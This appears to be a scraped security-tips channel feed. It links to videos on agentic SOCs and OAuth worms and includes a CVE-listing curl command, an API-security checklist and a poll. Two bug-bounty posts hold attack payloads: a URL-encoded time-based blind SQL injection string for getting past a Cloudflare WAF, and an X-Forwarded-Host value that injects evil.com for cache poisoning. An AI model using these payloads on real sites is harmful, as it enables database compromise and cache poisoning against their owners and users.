Agentic SOCs Explained | The Future of Security Operations
https://www.youtube.com/watch?v=ZxQLbagvyOI
Complete Agentic SOC Roadmap:
https://hacklido.com/blog/1355-agentic-soc-roadmap-from-beginner-to-advanced
https://www.youtube.com/watch?v=ZxQLbagvyOI
Complete Agentic SOC Roadmap:
https://hacklido.com/blog/1355-agentic-soc-roadmap-from-beginner-to-advanced
YouTube
Agentic SOCs Explained | The Future of Security Operations + Complete Learning Roadmap
In this video, we explain what Agentic SOCs are, how they work, and why they represent the future of Security Operations Centers (SOC).
An Agentic SOC uses AI agents and automation to assist SOC analysts with alert triage, investigation, threat hunting,β¦
An Agentic SOC uses AI agents and automation to assist SOC analysts with alert triage, investigation, threat hunting,β¦
How I track the latest CVEs β top 20, fast π₯
curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq -r '.cves[:20][]?.cve_id'
==> Want id+summary?
curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq '[.cves
| sort_by(.published? // .Published? // .modified? // "1970-01-01")
| reverse
| .[:20][]? | {cve_id, summary}]'
Note : Make sure you remove the space between https:/ and /cvedb before using the command must be https://
Tool: cvedb.shodan.io
curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq -r '.cves[:20][]?.cve_id'
==> Want id+summary?
curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq '[.cves
| sort_by(.published? // .Published? // .modified? // "1970-01-01")
| reverse
| .[:20][]? | {cve_id, summary}]'
Note : Make sure you remove the space between https:/ and /cvedb before using the command must be https://
Tool: cvedb.shodan.io
Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
β Blocked Payload
(select(0)from(select(sleep(10)))v) β 403 Forbidden
β Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
π This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
β Blocked Payload
(select(0)from(select(sleep(10)))v) β 403 Forbidden
β Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
π This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
β€3
CACHE POISONING QUICK WIN:
Most apps validate X-Forwarded-Host as a single value.
But try this:
X-Forwarded-Host: http://legit.com, http://evil.com
β’ CDN: Reads first β Allows β
β’ App: Reads last β Injects
Most apps validate X-Forwarded-Host as a single value.
But try this:
X-Forwarded-Host: http://legit.com, http://evil.com
β’ CDN: Reads first β Allows β
β’ App: Reads last β Injects
π *How to Secure Your APIs β A Practical Guide*
APIs are the backbone of modern apps β but without security, they become open doors to attacks. Here's how to lock them down effectively:
---
β *1. Use Authentication & Authorization*
- Implement *OAuth2*, *JWT*, or *API keys*
- Enforce *role-based access control (RBAC)*
---
π *2. Validate Inputs Strictly*
- Sanitize user inputs
- Use strong data validation (e.g., Joi, Yup)
- Prevent SQL & NoSQL injection
---
π¦ *3. Rate Limiting & Throttling*
- Control request frequency to avoid abuse
- Use tools like *NGINX*, *API Gateway*, or *Cloudflare*
---
π *4. Use HTTPS Everywhere*
- Encrypt all data in transit
- Never expose APIs over HTTP
---
π΅οΈββοΈ *5. Monitor & Log*
- Track unusual behavior
- Use centralized logging (e.g., ELK, Datadog)
---
𧱠*6. CORS & Firewall Rules*
- Restrict allowed origins
- Protect using *WAFs* and IP whitelisting
---
Secure APIs = Safe apps + Protected data + Trusted users
Build smart. Build safe.
APIs are the backbone of modern apps β but without security, they become open doors to attacks. Here's how to lock them down effectively:
---
β *1. Use Authentication & Authorization*
- Implement *OAuth2*, *JWT*, or *API keys*
- Enforce *role-based access control (RBAC)*
---
π *2. Validate Inputs Strictly*
- Sanitize user inputs
- Use strong data validation (e.g., Joi, Yup)
- Prevent SQL & NoSQL injection
---
π¦ *3. Rate Limiting & Throttling*
- Control request frequency to avoid abuse
- Use tools like *NGINX*, *API Gateway*, or *Cloudflare*
---
π *4. Use HTTPS Everywhere*
- Encrypt all data in transit
- Never expose APIs over HTTP
---
π΅οΈββοΈ *5. Monitor & Log*
- Track unusual behavior
- Use centralized logging (e.g., ELK, Datadog)
---
𧱠*6. CORS & Firewall Rules*
- Restrict allowed origins
- Protect using *WAFs* and IP whitelisting
---
Secure APIs = Safe apps + Protected data + Trusted users
Build smart. Build safe.
β€1π₯1
Check out today's sandwich ππ»
Video
https://www.youtube.com/watch?v=H8CQ7XrCCdg
Blog
https://hacklido.com/blog/1366-the-invisible-virus-understanding-oauth-worms
Video
https://www.youtube.com/watch?v=H8CQ7XrCCdg
Blog
https://hacklido.com/blog/1366-the-invisible-virus-understanding-oauth-worms
YouTube
Oath Worms | The Silent Cybersecurity Menace
Oath Worms represent a new generation of cyber threatsβself-propagating, stealthy, and highly destructive. As cybersecurity landscapes evolve, attackers are leveraging advanced malware techniques to exploit vulnerabilities faster than ever before.
This deepβ¦
This deepβ¦
How do you prefer to learn?
Anonymous Poll
11%
Reading textbooks or blogs
23%
Watching videos
66%
Hands-on practice
β€3